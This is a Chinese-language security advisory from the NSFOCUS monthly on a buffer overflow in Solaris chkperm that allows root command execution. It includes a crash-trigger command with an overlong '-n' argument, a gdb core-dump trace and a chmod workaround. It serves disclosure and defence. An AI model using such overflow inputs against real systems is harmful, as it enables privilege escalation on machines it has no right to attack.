首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第5期->最新漏洞
期刊号: 类型: 关键词:
Solaris chkperm 缓冲区溢出漏洞

主页:http://www.nsfocus.com/
日期:1999-12-14

发布日期: 2000-1-7
更新日期: 2000-1-7
受影响的系统:  
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86HW5/98
Sun Solaris 2.6_x86HW3/98
Sun Solaris 2.6_x86
Sun Solaris 2.6HW5/98
Sun Solaris 2.6HW3/98
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1_ppc
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
--------------------------------------------------------------------------------

描述:

Sun的'/usr/vmsys/bin/chkperm '程序中存在一个缓存溢出漏洞,通过向checkperm的'-n'
参数提供一个包含精心设计的可执行代码的字符串,攻击者可以以root身份执行任意命令.

--------------------------------------------------------------------------------

测试程序:

警 告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


[Hackerslab:/users/loveyou/buf]$ chkperm -n `perl -e 'print "x" x 200'`
Segmentation fault (core dumped)
[hackerslab:/users/loveyou/buf]$ gdb chkperm core
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (sparc-sun-solaris2.5.1),
Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
Core was generated by `./chkperm -n xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxx'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
Reading symbols from /usr/platform/SUNW,Ultra-Enterprise/lib/libc_psr.so.1...
(no debugging symbols found)...done.
#0 0xef73ea68 in nvmatch ()

--------------------------------------------------------------------------------
建议:
临时解决办法:
chmod 400 /usr/vmsys/bin/chkperm

版权所有,未经许可,不得转载